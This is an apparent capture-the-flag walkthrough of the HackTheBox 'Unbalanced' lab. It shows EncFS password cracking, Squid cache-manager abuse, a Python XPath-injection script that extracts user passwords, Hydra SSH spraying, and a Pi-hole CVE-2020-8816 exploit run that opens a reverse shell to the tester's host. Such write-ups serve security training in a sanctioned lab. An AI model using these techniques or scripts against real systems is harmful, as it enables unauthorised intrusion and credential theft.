by Welcome back, folks. This writeup is about the HackTheBox Unbalanced machine (10.10.10.200) that released last Saturday.
Initial Foothold and the user
The initial foothold was finding the RSync from NMAP scan, then downloading the RSync directories to find them encrypted. Cracking the encrypted directories using John reveals the hidden configuration files that led me to gain control over the Squid Proxy. The User was harder than getting root, the X-path vulnerability in the login page ultimately reveals the credentials so finally I was able to SSH and get the user. The deep enumeration is must.
The Root
The User Bryan has a To-Do list which reveals incomplete section of the application he’s developing. Further enumeration reveals Pi-hole is the application and the installed version is vulnerable, a public exploit gives access to reverse shell and then a bash script reveals an Administrator password that gives privilege escalation as root.
Let me clear the point first, This machine is *insane*
OS: Linux
Difficulty: Hard
Points: 40
Release: 01 Aug 2020
IP: 10.10.10.200
Enumeration
As a best practice I add the machine IP to my hosts file as unbalanced.htb and started-off with NAMP scan. The NMAP scan reveals the port 22, 873 and 3128 are open. However, strangely the port 80 or 8080 isn’t open which is obvious.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
| 256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_ 256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp open rsync (protocol version 31)
3128/tcp open http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).RSync
As I can see RSync port is open the service is running, I went ahead and list the modules
root@nav1n:~/htb/unbalanced # rsync -a rsync://unbalanced.htb:873
conf_backups EncFS-encrypted configuration backups
root@nav1n:~/htb/unbalanced # Let us download the directories and analyze them.
root@nav1n:~/htb/unbalanced # rsync -av rsync://unbalanced.htb/conf_backups conf_backups
receiving incremental file list
created directory conf_backups
./
,CBjPJW4EGlcqwZW4nmVqBA6
-FjZ6-6,Fa,tMvlDsuVAO7ek
.encfs6.xml
0K72OfkNRRx3-f0Y6eQKwnjn
27FonaNT2gnNc3voXuKWgEFP4sE9mxg0OZ96NB0x4OcLo-
2VyeljxHWrDX37La6FhUGIJS
3E2fC7coj5,XQ8LbNXVX9hNFhsqCjD-g3b-7Pb5VJHx3C1
3cdBkrRF7R5bYe1ZJ0KYy786
3xB4vSQH-HKVcOMQIs02Qb9,
4J8k09nLNFsb7S-JXkxQffpbCKeKFNJLk6NRQmI11FazC1
5-6yZKVDjG4n-AMPD65LOpz6-kz,ae0p2VOWzCokOwxbt,
5FTRnQDoLdRfOEPkrhM2L29P
5IUA28wOw0wwBs8rP5xjkFSs
6R1rXixtFRQ5c9ScY8MBQ1Rg
7-dPsi7efZRoXkZ5oz1AxVd-Q,L05rofx0Mx8N2dQyUNA,
7zivDbWdbySIQARaHlm3NbC-7dUYF-rpYHSQqLNuHTVVN1
8CBL-MBKTDMgB6AT2nfWfq-e
8XDA,IOhFFlhh120yl54Q0da
8e6TAzw0xs2LVxgohuXHhWjM
9F9Y,UITgMo5zsWaP1TwmOm8EvDCWwUZurrL0TwjR,Gxl0
A4qOD1nvqe9JgKnslwk1sUzO
Acv0PEQX8vs-KdK307QNHaiF
B6J5M3OP0X7W25ITnaZX753T
Chlsy5ahvpl5Q0o3hMyUIlNwJbiNG99DxXJeR5vXXFgHC1
ECXONXBBRwhb5tYOIcjjFZzh
F4F9opY2nhVVnRgiQ,OUs-Y0
FGZsMmjhKz7CJ2r-OjxkdOfKdEip4Gx2vCDI24GXSF5eB1
FSXWRSwW6vOvJ0ExPK0fXJ6F
IymL3QugM,XxLuKEdwJJOOpi
KPYfvxIoOlrRjTY18zi8Wne-
Kb-,NDTgYevHOGdHCYsSQhhIHrUGjiM6i2JZcl,-PKAJm0
Kpo3MHQxksW2uYX79XngQu-f
KtFc,DR7HqmGdPOkM2CpLaM9
Mv5TtpmUNnVl-fgqQeYAy8uu
MxgjShAeN6AmkH2tQAsfaj6C
Ni8LDatT134DF6hhQf5ESpo5
Nlne5rpWkOxkPNC15SEeJ8g,
OFG2vAoaW3Tvv1X2J5fy4UV8
OvBqims-kvgGyJJqZ59IbGfy
StlxkG05UY9zWNHBhXxukuP9
TZGfSHeAM42o9TgjGUdOSdrd
VQjGnKU1puKhF6pQG1aah6rc
W5,ILrUB4dBVW-Jby5AUcGsz
Wr0grx0GnkLFl8qT3L0CyTE6
X93-uArUSTL,kiJpOeovWTaP
Ya30M5le2NKbF6rD-qD3M-7t
Yw0UEJYKN,Hjf-QGqo3WObHy
Z8,hYzUjW0GnBk1JP,8ghCsC
ZXUUpn9SCTerl0dinZQYwxrx
ZvkMNEBKPRpOHbGoefPa737T
a4zdmLrBYDC24s9Z59y-Pwa2
c9w3APbCYWfWLsq7NFOdjQpA
cwJnkiUiyfhynK2CvJT7rbUrS3AEJipP7zhItWiLcRVSA1
dF2GU58wFl3x5R7aDE6QEnDj
dNTEvgsjgG6lKBr8ev8Dw,p7
gK5Z2BBMSh9iFyCFfIthbkQ6
gRhKiGIEm4SvYkTCLlOQPeh-
hqZXaSCJi-Jso02DJlwCtYoz
iaDKfUAHJmdqTDVZsmCIS,Bn
jIY9q65HMBxJqUW48LJIc,Fj
kdJ5whfqyrkk6avAhlX-x0kh
kheep9TIpbbdwNSfmNU1QNk-
l,LY6YoFepcaLg67YoILNGg0
lWiv4yDEUfliy,Znm17Al41zi0BbMtCbN8wK4gHc333mt,
mMGincizgMjpsBjkhWq-Oy0D
oPu0EVyHA6,KmoI1T,LTs83x
pfTT,nZnCUFzyPPOeX9NwQVo
pn6YPUx69xqxRXKqg5B5D2ON
q5RFgoRK2Ttl3U5W8fjtyriX
qeHNkZencKDjkr3R746ZzO5K
sNiR-scp-DZrXHg4coa9KBmZ
sfT89u8dsEY4n99lNsUFOwki
uEtPZwC2tjaQELJmnNRTCLYU
vCsXjR1qQmPO5g3P3kiFyO84
waEzfb8hYE47wHeslfs1MvYdVxqTtQ8XGshJssXMmvOsZLhtJWWRX31cBfhdVygrCV5
sent 1,452 bytes received 411,990 bytes 33,075.36 bytes/sec
total size is 405,603 speedup is 0.98
root@nav1n:~/htb/unbalanced #
After downloading the files and doing some analysis I figured out that these are EncFS encrypted file-system. Also, I found an .encfs6.xml file with the following content.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE boost_serialization>
<boost_serialization signature="serialization::archive" version="7">
<cfg class_id="0" tracking_level="0" version="20">
<version>20100713</version>
<creator>EncFS 1.9.5</creator>
<cipherAlg class_id="1" tracking_level="0" version="0">
<name>ssl/aes</name>
<major>3</major>
<minor>0</minor>
</cipherAlg>
<nameAlg>
<name>nameio/block</name>
<major>4</major>
<minor>0</minor>
</nameAlg>
<keySize>192</keySize>
<blockSize>1024</blockSize>
<plainData>0</plainData>
<uniqueIV>1</uniqueIV>
<chainedNameIV>1</chainedNameIV>
<externalIVChaining>0</externalIVChaining>
<blockMACBytes>0</blockMACBytes>
<blockMACRandBytes>0</blockMACRandBytes>
<allowHoles>1</allowHoles>
<encodedKeySize>44</encodedKeySize>
<encodedKeyData>
GypYDeps2hrt2W0LcvQ94TKyOfUcIkhSAw3+iJLaLK0yntwAaBWj6EuIet0=
</encodedKeyData>
<saltLen>20</saltLen>
<saltData>
mRdqbk2WwLMrrZ1P6z2OQlFl8QU=
</saltData>
<kdfIterations>580280</kdfIterations>
<desiredKDFDuration>500</desiredKDFDuration>
</cfg>
</boost_serialization>The XML file contains the metadata and the key data. Looking for solutions to decrypt the files, I found a potential solution in the GitHub. The Python script that could potentially crack the eCryptfs. As per the documentation, I run the cracker encfs2john.py as follows and got the hash from the encrypted folder conf_backups.
root@nav1n:~/htb/unbalanced # python encfs2john.py conf_backups/ > unbalanced.hash
root@nav1n:~/htb/unbalanced # cat unbalanced.hash
conf_backups/:$encfs$192*580280*0*20*99176a6e4d96c0b32bad9d4feb3d8e425165f105*44*1b2a580dea6cda1aedd96d0b72f43de132b239f51c224852030dfe8892da2cad329edc006815a3e84b887addOnce I have the hash, ran it through John using the Rockyou as word file to get the passphrase. John cracked the Passphrase successfully: bubblegum
root@nav1n:~/htb/unbalanced # john --wordlist=/usr/share/wordlists/rockyou.txt unbalanced.hash
Using default input encoding: UTF-8
Loaded 1 password hash (EncFS [PBKDF2-SHA1 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 580280 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bubblegum (conf_backups/)
1g 0:00:00:43 DONE (2020-08-03 18:52) 0.02282g/s 16.43p/s 16.43c/s 16.43C/s bambam..marissa
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@nav1n:~/htb/unbalanced # Decrypting The Directory
To decrypt the encrypted directory, I need Encfs (EncFS Encrypted File system) to be installed locally. The GitHub repo has full detailed documentation. I installed EncFS by referring the documentation and after installation and reading a couple of blog posts, I understood how the Encfs works. A quick googling, I found an article that shows how to mount encrypted EncFS and how to decrypt it using the passphrase.
As I already have the passphrase, I successfully mount the encrypted the directory and decrypt it. Going through the newly created conf_backups_decryped directory I noticed a lot of xxxxxxxxxxxx.conf files.
root@nav1n:~/htb/unbalanced # encfs /conf_backups/ /conf_backups_decryped/
EncFS Password:
root@nav1n:~/htb/unbalanced # cd conf_backups_decryped
root@nav1n:~/htb/unbalanced/conf_backups_decryped # ls -la
total 628
drwxr-xr-x 2 root root 4096 Apr 4 18:05 .
drwxr-xr-x 7 root root 4096 Aug 3 19:11 ..
-rw-r--r-- 1 root root 267 Apr 4 18:05 50-localauthority.conf
-rw-r--r-- 1 root root 455 Apr 4 18:05 50-nullbackend.conf
-rw-r--r-- 1 root root 48 Apr 4 18:05 51-debian-sudo.conf
-rw-r--r-- 1 root root 182 Apr 4 18:05 70debconf
-rw-r--r-- 1 root root 2351 Apr 4 18:05 99-sysctl.conf
-rw-r--r-- 1 root root 4564 Apr 4 18:05 access.conf
-rw-r--r-- 1 root root 2981 Apr 4 18:05 adduser.conf
-rw-r--r-- 1 root root 1456 Apr 4 18:05 bluetooth.conf
======snip========Going through the list of files, I noticed “squid.conf“, this file caught my attention because I saw the Squid proxy is running on the port 3128 in the Unbalanced machine.
The configuration file contains the following:
The ACL (Access control lists)
acl localnet src 0.0.0.1-0.255.255.255 # RFC 1122 "this" network (LAN)
acl localnet src 10.0.0.0/8 # RFC 1918 local private network (LAN)
acl localnet src 100.64.0.0/10 # RFC 6598 shared address space (CGN)
acl localnet src 169.254.0.0/16 # RFC 3927 link-local (directly plugged) machines
acl localnet src 172.16.0.0/12 # RFC 1918 local private network (LAN)
acl localnet src 192.168.0.0/16 # RFC 1918 local private network (LAN)
acl localnet src fc00::/7 # RFC 4193 local private network range
acl localnet src fe80::/10 # RFC 4291 link-local (directly plugged) machines
acl SSL_ports port 443
acl Safe_ports port 80 # http
acl Safe_ports port 21 # ftp
acl Safe_ports port 443 # https
acl Safe_ports port 70 # gopher
acl Safe_ports port 210 # wais
acl Safe_ports port 1025-65535 # unregistered ports
acl Safe_ports port 280 # http-mgmt
acl Safe_ports port 488 # gss-http
acl Safe_ports port 591 # filemaker
acl Safe_ports port 777 # multiling http
acl CONNECT method CONNECTA New Subdomain
I found a new subdomain intranet.unbalanced.htb
# Allow access to intranet
acl intranet dstdomain -n intranet.unbalanced.htb
acl intranet_net dst -n 172.16.0.0/12
http_access allow intranet
http_access allow intranet_net
# And finally deny all other access to this proxy
http_access deny all
#http_access allow allCache Manager Credentials
cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
cachemgr_passwd disable allThe Squid Proxy
As I can see there is a new subdomain intranet.unbalanced.htb running, but can only be accessed through Squid proxy on the port 3128, I need to install it first.
Installed / Enabled and Running
Then, I update the Firefox proxy set as Unbalanced proxy setting:
Then, I browse the subdomain http://intranet.unbalanced.htb but it didn’t work, I was getting unable to load error, I tried different settings in the proxy but didn’t work. After a few minutes trail and error, I realized I supposed to replace the squid.conf with the one I found in the decrypted folder. I replaced the configuration file and restart the squid service and browse the page again and there it goes, I have the page opened.
The http://intranet.unbalanced.htb
GoBuster to Discover Files
As the login page didn’t allow me to do any exploit, I decided to run GoBuster to find possible files and directories that may have hidden from direct access. After running GoBuster a while, I found the following files:
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://intranet.unbalanced.htb
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] Proxy: http://10.10.10.200:3128
[+] User Agent: gobuster/3.0.1
[+] Show length: true
[+] Extensions: html,log,php,xml,cgi,htm
[+] Timeout: 10s
===============================================================
2020/08/03 20:12:22 Starting gobuster
===============================================================
/css (Status: 301) [Size: 194]
[ERROR] 2020/08/03 20:13:02 [!] Get http://intranet.unbalanced.htb/control.php: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/03 20:13:02 [!] Get http://intranet.unbalanced.htb/corba.cgi: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
/employees.xml (Status: 403) [Size: 178]
/index.php (Status: 302) [Size: 0]
/index.php (Status: 302) [Size: 0]
/intranet.php (Status: 200) [Size: 6736]
[ERROR] 2020/08/03 20:13:56 [!] Get http://intranet.unbalanced.htb/registered.cgi: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
[ERROR] 2020/08/03 20:13:56 [!] Get http://intranet.unbalanced.htb/rcs.htm: net/http: request canceled (Client.Timeout exceeded while awaiting headers)/employees.xml - 403
/index.php - 302
/intranet.php - 200Except the intranet.php, the other two files were unable to access. So I need to find another way to go forward. I recalled the Cache Manager credential I found in the decryption process earlier. Looking for Squid Cache manager I found an article.based on the article I browse the bellow url
http://mycache.example.com:3128/squid-internal-mgr/info
And got access denied, it means there is something I could still be able to exploit.
Finding different Hosts and Subnets in the network.
As I know from the previously found ACL, there are other subnets in the network, possibly only be able to access from the Squid:
acl localnet src 100.64.0.0/10 # RFC 6598 shared address space (CGN)
acl localnet src 169.254.0.0/16 # RFC 3927 link-local (directly plugged) machines
acl localnet src 172.16.0.0/12 # RFC 1918 local private network (LAN)
acl localnet src 192.168.0.0/16 # RFC 1918 local private network (LAN)Referring this article again to I started to find hosts within the subnets mentioned in the ACL. Upon checking the Class B address.
SQUIDClinet Command:
SquidClient is a tool that I downloaded to run the Squid commands from my local machine, since I already have Squid password, it’s easy for me to gather information.
squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menuroot@nav1n:~/htb/unbalanced # squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
---snip----
Via: 1.1 unbalanced (squid/4.6)
Connection: close
index Cache Manager Interface disabled
menu Cache Manager Menu protected
offline_toggle Toggle offline_mode setting disabled
shutdown Shut Down the Squid Process disabled
reconfigure Reconfigure Squid disabled
rotate Rotate Squid Logs disabled
pconn Persistent Connection Utilization Histograms protected
mem Memory Utilization protected
diskd DISKD Stats protected
squidaio_counts Async IO Function Counters disabled
config Current Squid Configuration disabled
client_list Cache Client List disabled
comm_epoll_incoming comm_incoming() stats disabled
ipcache IP Cache Stats and Contents disabled
fqdncache FQDN Cache Stats and Contents protected
idns Internal DNS Statistics disabled
redirector URL Redirector Stats disabled
store_id StoreId helper Stats disabled
external_acl External ACL stats disabled
http_headers HTTP Header Statistics disabled
info General Runtime Information disabled
service_times Service Times (Percentiles) disabled
filedescriptors Process Filedescriptor Allocation protected
objects All Cache Objects protected
vm_objects In-Memory and In-Transit Objects protected
io Server-side network read() size histograms disabled
counters Traffic and Resource Counters protected
peer_select Peer Selection Algorithms disabled
digest_stats Cache Digest and ICP blob disabled
5min 5 Minute Average of Counters protected
60min 60 Minute Average of Counters protected
utilization Cache Utilization disabled
histograms Full Histogram Counts protected
active_requests Client-side Active Requests disabled
username_cache Active Cached Usernames disabled
openfd_objects Objects with Swapout files open disabled
store_digest Store Digest disabled
store_log_tags Histogram of store.log tags disabled
storedir Store Directory Stats disabled
store_io Store IO Interface Stats disabled
store_check_cachable_stats storeCheckCachable() Stats disabled
refresh Refresh Algorithm Statistics disabled
delay Delay Pool Levels disabled
forward Request Forwarding Statistics disabled
cbdata Callback Data Registry Contents protected
sbuf String-Buffer statistics protected
events Event Queue protected
netdb Network Measurement Database disabled
asndb AS Number Database disabled
carp CARP information disabled
userhash peer userhash information disabled
sourcehash peer sourcehash information disabled
server_list Peer Cache Statistics disabled
root@nav1n:~/htb/unbalanced #
Going further and analyzing the different menus, I found fqdncache. Since FQDN is fully qualified domain names, I decided to run and here is the result:
root@nav1n:~/htb/unbalanced # squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
---snip----
FQDN Cache Statistics:
FQDNcache Entries In Use: 11
FQDNcache Entries Cached: 9
FQDNcache Requests: 11573
FQDNcache Hits: 0
FQDNcache Negative Hits: 5333
FQDNcache Misses: 6240
FQDN Cache Contents:
Address Flg TTL Cnt Hostnames
127.0.1.1 H -001 2 unbalanced.htb unbalanced
::1 H -001 3 localhost ip6-localhost ip6-loopback
172.31.179.2 H -001 1 intranet-host2.unbalanced.htb
172.31.179.3 H -001 1 intranet-host3.unbalanced.htb
10.10.14.172 N -10704 0
127.0.0.1 H -001 1 localhost
172.17.0.1 H -001 1 intranet.unbalanced.htb
ff02::1 H -001 1 ip6-allnodes
ff02::2 H -001 1 ip6-allrouters
So, I have two new hosts intranet-host2.unbalanced.htb – 172.31.179.2 and intranet-host3.unbalanced.htb – 172.31.179.3. However, I was not able to access the URLs directly, but the website loaded using the direct IP. Both websites are either replica of the employee login page or redirect to the Intranet portal I found earlier: http://intranet.unbalanced.htb.
I load the IP 172.31.179.1 as it’s the only IP wasn’t listed in the hosts name, I was welcomed with following error:
But if I add intranet.php to the URL, I again received the similar login page I found earlier.
Testing the Login Vulnerability
As I normally do with all the previous login pages, I did the same SQLi ‘ or ”=’, luckily this page was vulnerable and I received the following users and their email ids.
So the vulnerable login page reveals 4 users with their email ids:
- Rita – rita@unbalanced.htb | HR Manager
- Jim – jim@unbalanced.htb | Web Designer
- Bryan – bryan@unbalanced.htb | System Administrator
- Sarah – sarah@unbalanced.htb | Team Leader
As we can see the x-path injection is possible to on the login page, I decided to try brute force the password. The payload must be single character at a time.
The Script:
url = 'http://172.31.179.1/intranet.php'
proxy_url = 'http://10.10.10.200:3128'
w = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*(){}:"<>?'
u = ['rita', 'jim', 'bryan', 'sarah']
for user in u:
data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password,0,1)='x"}
request = requests.post(url, data=data, proxies={'http':proxy_url})
b = len(request.text)
cracked_pass = ''
for i in range(1,80):
found = False
for c in w:
data = {'Username': '', 'Password': "' or Username='" + user + "' and substring(Password," + str(i) + ",1)='" + c + ""}
request = requests.post(url, data=data, proxies={'http':proxy_url})
if len(request.text) != b:
found = True
break
if not found:
break
print('Attempting User {0}'.format(user))
print('[+]Found character: {2}'.format(user, i, c))
cracked_pass += c
print (cracked_pass)I found the password of the all 4 users.
root@nav1n:~/htb/unbalanced # python crack.py
rita:password01!
jim:stairwaytoheaven
bryan:ireallyl0vebubblegum!!!
sarah:sarah4evah'The passwords were not that helpful on the web page, they just displayed the username and their profession and the email that’s it.
Getting the User Flag
Then, I tried the same credentials for SSH the Unbalanced box and found the credential matched for user Bryan.
root@nav1n:~/htb/unbalanced # hydra -l users.txt -P pass.txt 10.10.10.200 -t 4 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-08-04 01:13:37
[DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking ssh://10.10.10.200:22/
[22][ssh] host: 10.10.10.200 login: bryan password: ireallyl0vebubblegum!!!
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-08-04 01:13:43
root@nav1n:~/htb/unbalanced #
I immediately SSH the box as Bryan. The user flag was found in Bryan’s home directly.
Having compromised the user, I proceed to enumerate Bryan’s directory. I found a file called “TODO”, reading it showed the following:
bryan@unbalanced:~$ cat TODO
############
# Intranet #
############
* Install new intranet-host3 docker [DONE]
* Rewrite the intranet-host3 code to fix Xpath vulnerability [DONE]
* Test intranet-host3 [DONE]
* Add intranet-host3 to load balancer [DONE]
* Take down intranet-host1 and intranet-host2 from load balancer (set as quiescent, weight zero) [DONE]
* Fix intranet-host2 [DONE]
* Re-add intranet-host2 to load balancer (set default weight) [DONE]
- Fix intranet-host1 [TODO]
- Re-add intranet-host1 to load balancer (set default weight) [TODO]
###########
# Pi-hole #
###########
* Install Pi-hole docker (only listening on 127.0.0.1) [DONE]
* Set temporary admin password [DONE]
* Create Pi-hole configuration script [IN PROGRESS]
- Run Pi-hole configuration script [TODO]
- Expose Pi-hole ports to the network [TODO]
bryan@unbalanced:~$ As per the TO-DO list, Bryan has installed Pi-hole locally which is listening on the local host only. A Pi-hole configuration file is created but not complete this triggers vulnerability. The Pi-hole is not exposed to external ports, so I need to find which port Pi-hole is listening to or open ports.
When I run the netstat command I come to know netstat is not installed in the system. So need to find another way. I found an article in the cPanel forum that shows how to netstat-without-netstat
The command:
# netstatawk - from https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
netstatawk() { ( awk 'function hextodec(str,ret,n,i,k,c){
ret = 0
n = length(str)
for (i = 1; i <= n; i++) {
c = tolower(substr(str, i, 1))
k = index("123456789abcdef", c)
ret = ret * 16 + k
}
return ret
}
function getIP(str,ret){
ret=hextodec(substr(str,index(str,":")-2,2));
for (i=5; i>0; i-=2) {
ret = ret"."hextodec(substr(str,i,2))
}
ret = ret":"hextodec(substr(str,index(str,":")+1,4))
return ret
}
NR > 1 {{if(NR==2)print "Local - Remote";local=getIP($2);remote=getIP($3)}{print local" - "remote}}' /proc/net/tcp ) }
I run the command from SSh through awk and here I found the ports listening. The result reveals, port 8080 and 5553 are listening locally.
I run the curl to find which port is hosting Pi-hole, the port 5553 seems unresponsive. And curling the port 8080 returns with error Invalid domain!
bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:5553
curl: (28) Operation timed out after 10001 milliseconds with 0 bytes received
bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:8080
[ERROR]: Unable to parse results from <i>queryads.php</i>: <code>Unhandled error message (<code>Invalid domain!</code>)</code>
bryan@unbalanced:~$
And adding the domain unbalanced, I got the results as below:
bryan@unbalanced:~$ curl --max-time 10 http://127.0.0.1:8080 -H 'Host: unbalanced'
<!DOCTYPE html>
<!-- Pi-hole: A black hole for Internet advertisements
* (c) 2017 Pi-hole, LLC (https://pi-hole.net)
------snip------
<footer><span>Monday 10:50 PM, August 03rd.</span> Pi-hole v4.3.2-0-ge41c4b5 (pihole.unbalanced.htb/172.31.11.3)</footer>
</div>
----snip-----
</body></html>
bryan@unbalanced:~$
The curl reveals another subdomain, pihole.unbalanced.htb is running on the local IP: 172.31.11.3. Again the url access is disabled, but I was able to access the web page through direct IP access.
As I know the Pi-hole dashboard is available on the page /admin, I browsed and I have the dashboard opened for me.
I logged-in using the http://172.31.11.3/admin/index.php?login page using the password “admin” as mentioned in the TODO list.
Admin Dashboard
Exploiting Pi-hole Version v4.3.2
As I saw the installed Pi-hole version 4.3.2, I knew there is a exploit for that. The version 4.3.2 is vulnerable to RCE which is given CVE-2020-8816.
Looking for the exploits, I found an exploit by AndreyRainchik, I immediately download it. However, I was not able to run the exploit remotely, So decided to do it locally by port forward pi-hole through SSH.
Getting Reverse Shell Ad www-data
I run the SSH port-forward:
root@nav1n:~/htb/unbalanced # ssh -NL 8080:127.0.0.1:8080 bryan@10.10.10.200I start my listener where I get the reverse shell after running the exploit (CVE-2020-8816) and run the exploit from another terminal:
root@nav1n:~/htb/unbalanced # python3 CVE-2020-8816.py http://127.0.0.1:8080 admin 10.10.14.22 9999And here is the reverse shell as www-data.
Going through the directories, we found the www-data is able to read /root/. That’s insane. Inside the /root/ directory we found a couple of files, ph_install.sh and pihole_config.sh. I without wasting time, I read the pihole_config.sh, as assumed, it contained credentials of Administrator user + email id.
Root.txt
$ cat pihole_config.sh
#!/bin/bash
# Add domains to whitelist
/usr/local/bin/pihole -w unbalanced.htb
/usr/local/bin/pihole -w rebalanced.htb
# Set temperature unit to Celsius
/usr/local/bin/pihole -a -c
# Add local host record
/usr/local/bin/pihole -a hostrecord pihole.unbalanced.htb 127.0.0.1
# Set privacy level
/usr/local/bin/pihole -a -l 4
# Set web admin interface password
/usr/local/bin/pihole -a -p 'bUbBl3gUm$43v3Ry0n3!'
# Set admin email
/usr/local/bin/pihole -a email admin@unbalanced.htb
$ As I now have the credentials of Admin, I moved to the SSH and SU as root with the new credential.
Thanks, it. I just pawned the Unbalanced machine. Thank you for your visit and hope you enjoyed this insane ride.
References
- https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/
- https://staaldraad.github.io/2017/12/20/netstat-without-netstat/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8816
- https://www.commandlinefu.com/commands/view/15313/check-open-ports-without-netstat-or-lsof
- https://wiki.squid-cache.org/Features/CacheManager
